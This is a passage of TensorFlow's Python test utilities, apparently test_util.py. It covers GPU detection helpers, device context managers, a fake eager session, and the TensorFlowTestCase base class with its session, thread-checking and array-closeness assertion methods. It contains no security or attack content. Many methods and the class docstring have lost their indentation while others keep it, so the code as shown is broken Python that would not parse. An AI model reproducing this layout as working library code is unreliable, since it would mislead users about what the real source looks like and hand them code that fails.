    # target-independent. Reconsider this option when we have more things like
    # this to keep in sync.
    # LINT.IfChange
    match = re.search(r"compute capability: (\d+)\.(\d+)", device_desc)
    # LINT.ThenChange(//tensorflow/core/\
    # common_runtime/gpu/gpu_device.cc)
    if not match:
      return 0, 0
    return int(match.group(1)), int(match.group(2))

  try:
    for local_device in device_lib.list_local_devices():
      if local_device.device_type == "GPU":
        # (major, minor) tuples compare lexicographically, matching the
        # notion of "compute capability at least X.Y".
        if (min_cuda_compute_capability is None or
            compute_capability_from_device_desc(
                local_device.physical_device_desc) >=
            min_cuda_compute_capability):
          return True
      if local_device.device_type == "SYCL" and not cuda_only:
        return True
    return False
  except errors_impl.NotFoundError as e:
    # A NotFoundError mentioning both "CUDA" and "not find" means the CUDA
    # libraries are missing; treat that as "no GPU". Anything else re-raises.
    if not all(x in str(e) for x in ["CUDA", "not find"]):
      raise e
    else:
      logging.error(str(e))
      return False
@contextlib.contextmanager
def device(use_gpu):
  """Uses gpu when requested and available."""
  gpu_requested_and_present = use_gpu and is_gpu_available()
  dev = "/device:GPU:0" if gpu_requested_and_present else "/device:CPU:0"
  with ops.device(dev):
    yield
@contextlib.contextmanager
def use_gpu():
  """Runs ops on GPU when one is available, otherwise on CPU."""
  with device(True):
    yield
@contextlib.contextmanager
def force_gpu():
  """Force the gpu to be used."""
  gpu_device_name = "/device:GPU:0"
  with ops.device(gpu_device_name):
    yield
@contextlib.contextmanager
def force_cpu():
  """Force the cpu to be used."""
  cpu_device_name = "/device:CPU:0"
  with ops.device(cpu_device_name):
    yield
class CapturedWrites(object):
  """A utility class to load the captured writes made to a stream."""

  def __init__(self, capture_location):
    # Path of the file that received the redirected writes.
    self.capture_location = capture_location

  def contents(self):
    """Get the captured writes as a single string."""
    with open(self.capture_location) as captured:
      return captured.read()
class FakeEagerSession(object):
  """Fake session so tests that conditionally use placeholders can use eager.

  There are a number of tests that conditionally use placeholders for shape
  inference. The pattern is demonstrated here:

  ```python
  with self.cached_session() as sess:
    if static_shape:
      y = math_ops.matmul(x, ...)
      feed_dict = {}
    else:
      x_ph = array_ops.placeholder(...)
      y = math_ops.matmul(x_ph, ...)
      feed_dict = {x_ph: x}
    val = sess.run(y, feed_dict=feed_dict)
  ```

  Since the feed_dict is empty when not using placeholders we should be able to
  call self.evaluate(), however this requires rewriting the test case.
  This class should be considered a stop-gap solution to get tests running with
  eager with minimal changes to the actual test.
  """

  def __init__(self, test_case):
    # The TestCase whose evaluate() will resolve fetches to numpy values.
    self._test_case = test_case

  def run(self, fetches, *args, **kwargs):
    """Evaluate `fetches`.

    Fail if additional args are specified.

    Args:
      fetches: A Tensor or a nested list/tuple of Tensors.
      *args: Positional arguments
      **kwargs: Keyword arguments

    Raises:
      RuntimeError: If args or kwargs are specified.

    Returns:
      Tensors as numpy values.
    """
    feed_dict = kwargs.pop("feed_dict", {})
    # Bug fix: both messages below were missing their closing parenthesis.
    if feed_dict:
      raise RuntimeError(
          "feed_dict is not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")

    if args or kwargs:
      raise RuntimeError(
          "Optional args are not supported when eager execution is enabled "
          "(in this case, sess.run(t) is shorthand for t.numpy())")

    return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
  """Wrapper around a Session that logs errors in run()."""

  def run(self, *args, **kwargs):
    try:
      return super(ErrorLoggingSession, self).run(*args, **kwargs)
    except errors.OutOfRangeError:
      # OutOfRangeError signals normal completion for tf.data pipelines, so
      # logging it would only clutter the test output.
      raise
    except Exception as e:  # pylint: disable=broad-except
      logging.error(str(e))
      raise
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow.
"""
  def __init__(self, methodName="runTest"):  # pylint: disable=invalid-name
    super(TensorFlowTestCase, self).__init__(methodName)
    # Threads registered by the test; each is checked in tearDown() via
    # check_termination().
    self._threads = []
    # Per-test temporary directory, created lazily by get_temp_dir().
    self._tempdir = None
    # Session memoized by cached_session(); closed by _ClearCachedSession().
    self._cached_session = None
  def setUp(self):
    """Resets the cached session, RNG seeds, and the default graph."""
    self._ClearCachedSession()
    # Seed both Python's and NumPy's RNGs for reproducible tests.
    random.seed(random_seed.DEFAULT_GRAPH_SEED)
    np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
    # Note: The following line is necessary because some test methods may error
    # out from within nested graph contexts (e.g., via assertRaises and
    # assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
    # under certain versions of Python. That would cause
    # ops.reset_default_graph() to throw an exception if the stack were not
    # cleared first.
    ops._default_graph_stack.reset()  # pylint: disable=protected-access
    ops.reset_default_graph()
    random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
    # Avoiding calling setUp() for the poorly named test_session method.
    if self.id().endswith(".test_session"):
      self.skipTest("Not a test.")
  def tearDown(self):
    # Verify that every thread registered during the test terminated cleanly.
    for thread in self._threads:
      thread.check_termination()

    self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
  @contextlib.contextmanager
  def captureWritesToStream(self, stream):
    """A context manager that captures the writes to a given stream.

    This context manager captures all writes to a given stream inside of a
    `CapturedWrites` object. When this context manager is created, it yields
    the `CapturedWrites` object. The captured contents can be accessed by
    calling `.contents()` on the `CapturedWrites`.

    For this function to work, the stream must have a file descriptor that
    can be modified using `os.dup` and `os.dup2`, and the stream must support
    a `.flush()` method. The default python sys.stdout and sys.stderr are
    examples of this. Note that this does not work in Colab or Jupyter
    notebooks, because those use alternate stdout streams.

    Example:
    ```python
    class MyOperatorTest(test_util.TensorFlowTestCase):
      def testMyOperator(self):
        input = [1.0, 2.0, 3.0, 4.0, 5.0]
        with self.captureWritesToStream(sys.stdout) as captured:
          result = MyOperator(input).eval()
        self.assertStartsWith(captured.contents(), "This was printed.")
    ```

    Args:
      stream: The stream whose writes should be captured. This
        stream must have a file descriptor, support writing via using that
        file descriptor, and must have a `.flush()` method.

    Yields:
      A `CapturedWrites` object that contains all writes to the specified stream
      made during this context.
    """
    # Flush pending output first so it is not attributed to the capture.
    stream.flush()
    fd = stream.fileno()
    tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
    tmp_file = open(tmp_file_path, "w")
    # Save the original target of `fd`, then redirect `fd` into the temp file
    # so writes at the OS level land there.
    orig_fd = os.dup(fd)
    os.dup2(tmp_file.fileno(), fd)
    try:
      yield CapturedWrites(tmp_file_path)
    finally:
      tmp_file.close()
      # Restore the stream's file descriptor to its original target.
      os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
  def _eval_tensor(self, tensor):
    # Resolves a single leaf value to its numpy form.
    if tensor is None:
      return None
    elif callable(tensor):
      # Zero-arg callables are invoked and their result evaluated recursively.
      return self._eval_helper(tensor())
    else:
      try:
        if sparse_tensor.is_sparse(tensor):
          # Preserve sparse structure as a SparseTensorValue triple.
          return sparse_tensor.SparseTensorValue(tensor.indices, tensor.values,
                                                 tensor.dense_shape)
        return tensor.numpy()
      except AttributeError as e:
        # Anything without .numpy() (and not sparse/None/callable) is
        # unsupported; chain the original error for context.
        six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
  # pylint: disable=g-doc-return-or-yield
  @contextlib.contextmanager
  def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
    """Returns a TensorFlow Session for use in executing tests.

    Note that this will set this session and the graph as global defaults.

    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
    the CPU.

    Example:
    ```python
    class MyOperatorTest(test_util.TensorFlowTestCase):
      def testMyOperator(self):
        with self.session(use_gpu=True):
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()
    ```

    Args:
      graph: Optional graph to use during the returned session.
      config: An optional config_pb2.ConfigProto to use to configure the
        session.
      use_gpu: If True, attempt to run as many ops as possible on GPU.
      force_gpu: If True, pin all ops to `/device:GPU:0`.

    Yields:
      A Session object that should be used as a context manager to surround
      the graph building and execution code in a test case.
    """
    if context.executing_eagerly():
      # Under eager execution there is no session; yield None so the caller's
      # `with` block still runs.
      yield None
    else:
      with self._create_session(graph, config, force_gpu) as sess:
        with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
          yield sess
  @contextlib.contextmanager
  def cached_session(self,
                     graph=None,
                     config=None,
                     use_gpu=False,
                     force_gpu=False):
    """Returns a TensorFlow Session for use in executing tests.

    This method behaves differently than self.session(): for performance reasons
    `cached_session` will by default reuse the same session within the same
    test. The session returned by this function will only be closed at the end
    of the test (in the TearDown function).

    Use the `use_gpu` and `force_gpu` options to control where ops are run. If
    `force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
    `use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
    the CPU.

    Example:
    ```python
    class MyOperatorTest(test_util.TensorFlowTestCase):
      def testMyOperator(self):
        with self.cached_session(use_gpu=True) as sess:
          valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
          result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
          invalid_input = [-1.0, 2.0, 7.0]
          with self.assertRaisesOpError("negative input not supported"):
            MyOperator(invalid_input).eval()
    ```

    Args:
      graph: Optional graph to use during the returned session.
      config: An optional config_pb2.ConfigProto to use to configure the
        session.
      use_gpu: If True, attempt to run as many ops as possible on GPU.
      force_gpu: If True, pin all ops to `/device:GPU:0`.

    Yields:
      A Session object that should be used as a context manager to surround
      the graph building and execution code in a test case.
    """
    if context.executing_eagerly():
      # Eager tests get a stand-in object whose run() delegates to
      # self.evaluate().
      yield FakeEagerSession(self)
    else:
      # Reuse (or lazily create) the per-test session; mismatched arguments
      # across calls within one test are an error.
      sess = self._get_cached_session(
          graph, config, force_gpu, crash_if_inconsistent_args=True)
      with self._constrain_devices_and_set_default(sess, use_gpu,
                                                   force_gpu) as cached:
        yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is a tensor then convert it to ndarray
if isinstance(a, ops.Tensor):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
  def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Checks `a` and `b` have the same shape and are element-wise close.

    Args:
      a: the expected value; anything `_GetNdArray` accepts.
      b: the actual value; anything `_GetNdArray` accepts.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: optional message included in the failure output.
    """
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # When the array rank is small, print its contents. Numpy array printing is
    # implemented using inefficient recursion so prints can cause tests to
    # time out.
    if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
      shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
                            "%s.") % (a.shape, b.shape, b)
    else:
      shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
                                                                     b.shape)
    self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
    msgs = [msg]
    if not np.allclose(a, b, rtol=rtol, atol=atol):
      # Adds more details to np.testing.assert_allclose.
      #
      # NOTE: numpy.allclose (and numpy.testing.assert_allclose)
      # checks whether two arrays are element-wise equal within a
      # tolerance. The relative difference (rtol * abs(b)) and the
      # absolute difference atol are added together to compare against
      # the absolute difference between a and b. Here, we want to
      # tell user which elements violate such conditions.
      cond = np.logical_or(
          np.abs(a - b) > atol + rtol * np.abs(b),
          np.isnan(a) != np.isnan(b))
      if a.ndim:
        x = a[np.where(cond)]
        y = b[np.where(cond)]
        msgs.append("not close where = {}".format(np.where(cond)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not close lhs = {}".format(x))
      msgs.append("not close rhs = {}".format(y))
      msgs.append("not close dif = {}".format(np.abs(x - y)))
      msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
      msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
      # TODO(xpan): There seems to be a bug:
      # tensorflow/compiler/tests:binary_ops_test pass with float32
      # nan even though the equal_nan is False by default internally.
      np.testing.assert_allclose(
          a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join([str(p) for p in path]) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections.Mapping)
if a_is_dict != isinstance(b, collections.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
  @py_func_if_in_function
  def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
    """Asserts that two structures of numpy arrays or Tensors, have near values.

    `a` and `b` can be arbitrarily nested structures. A layer of a nested
    structure can be a `dict`, `namedtuple`, `tuple` or `list`.

    Args:
      a: The expected numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested of
        structure of these.
      b: The actual numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor), or any arbitrarily nested of
        structure of these.
      rtol: relative tolerance.
      atol: absolute tolerance.
      msg: Optional message to report on failure.

    Raises:
      ValueError: if only one of `a[p]` and `b[p]` is a dict or
        `a[p]` and `b[p]` have different length, where `[p]` denotes a path
        to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
        `[p] = [1]['d']`, then `a[p] = (6, 7)`.
    """
    # All of the traversal/comparison work lives in the recursive helper.
    self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
  @py_func_if_in_function
  def assertAllCloseAccordingToType(self,
                                    a,
                                    b,
                                    rtol=1e-6,
                                    atol=1e-6,
                                    float_rtol=1e-6,
                                    float_atol=1e-6,
                                    half_rtol=1e-3,
                                    half_atol=1e-3,
                                    bfloat16_rtol=1e-2,
                                    bfloat16_atol=1e-2,
                                    msg=None):
    """Like assertAllClose, but also suitable for comparing fp16 arrays.

    In particular, the tolerance is reduced to 1e-3 if at least
    one of the arguments is of type float16.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      rtol: relative tolerance.
      atol: absolute tolerance.
      float_rtol: relative tolerance for float32.
      float_atol: absolute tolerance for float32.
      half_rtol: relative tolerance for float16.
      half_atol: absolute tolerance for float16.
      bfloat16_rtol: relative tolerance for bfloat16.
      bfloat16_atol: absolute tolerance for bfloat16.
      msg: Optional message to report on failure.
    """
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # types with lower tol are put later to overwrite previous ones.
    if (a.dtype == np.float32 or b.dtype == np.float32 or
        a.dtype == np.complex64 or b.dtype == np.complex64):
      rtol = max(rtol, float_rtol)
      atol = max(atol, float_atol)
    if a.dtype == np.float16 or b.dtype == np.float16:
      rtol = max(rtol, half_rtol)
      atol = max(atol, half_atol)
    if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
        b.dtype == dtypes.bfloat16.as_numpy_dtype):
      rtol = max(rtol, bfloat16_rtol)
      atol = max(atol, bfloat16_atol)
    # The loosest applicable tolerance wins via max() above.
    self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
  @py_func_if_in_function
  def assertAllEqual(self, a, b, msg=None):
    """Asserts that two numpy arrays or Tensors have the same values.

    Args:
      a: the expected numpy ndarray or anything can be converted to one.
      b: the actual numpy ndarray or anything can be converted to one.
      msg: Optional message to report on failure.
    """
    msg = msg if msg else ""
    a = self._GetNdArray(a)
    b = self._GetNdArray(b)
    # Arbitrary bounds so that we don't print giant tensors.
    if (b.ndim <= 3 or b.size < 500):
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " Contents: %s. \n%s." % (a.shape, b.shape, b, msg))
    else:
      self.assertEqual(
          a.shape, b.shape, "Shape mismatch: expected %s, got %s."
          " %s" % (a.shape, b.shape, msg))
    same = (a == b)
    # For floating dtypes, treat NaN == NaN as equal so all-NaN positions
    # do not trip the comparison below.
    if (a.dtype in [
        np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
    ]):
      same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
    msgs = [msg]
    if not np.all(same):
      # Adds more details to np.testing.assert_array_equal.
      diff = np.logical_not(same)
      if a.ndim:
        x = a[np.where(diff)]
        y = b[np.where(diff)]
        msgs.append("not equal where = {}".format(np.where(diff)))
      else:
        # np.where is broken for scalars
        x, y = a, b
      msgs.append("not equal lhs = {}".format(x))
      msgs.append("not equal rhs = {}".format(y))
      np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
  @py_func_if_in_function
  def assertAllInRange(self,
                       target,
                       lower_bound,
                       upper_bound,
                       open_lower_bound=False,
                       open_upper_bound=False):
    """Assert that elements in a Tensor are all in a given range.

    Args:
      target: The numpy `ndarray`, or anything that can be converted into a
        numpy `ndarray` (including Tensor).
      lower_bound: lower bound of the range
      upper_bound: upper bound of the range
      open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
        than the default >=)
      open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
        than the default <=)

    Raises:
      AssertionError:
        if the value tensor does not have an ordered numeric type (float* or
          int*), or
        if there are nan values, or
        if any of the elements do not fall in the specified range.
    """
    target = self._GetNdArray(target)
    # Range comparisons are only meaningful for ordered numeric dtypes.
    if not (np.issubdtype(target.dtype, np.floating) or
            np.issubdtype(target.dtype, np.integer)):
      raise AssertionError(
          "The value of %s does not have an ordered numeric type, instead it "
          "has type: %s" % (target, target.dtype))
    # NaN compares false with everything, so it must be rejected explicitly
    # before the bound checks below.
    nan_subscripts = np.where(np.isnan(target))
    if np.size(nan_subscripts):
      raise AssertionError(
          "%d of the %d element(s) are NaN. "
          "Subscripts(s) and value(s) of the NaN element(s):\n" %
          (len(nan_subscripts[0]), np.size(target)) +
          "\n".join(self._format_subscripts(nan_subscripts, target)))
    range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
                 str(upper_bound) + (")" if open_upper_bound else "]"))
    violations = (
        np.less_equal(target, lower_bound)
        if open_lower_bound else np.less(target, lower_bound))
    violations = np.logical_or(
        violations,
        np.greater_equal(target, upper_bound)
        if open_upper_bound else np.greater(target, upper_bound))
    violation_subscripts = np.where(violations)
    if np.size(violation_subscripts):
      raise AssertionError(
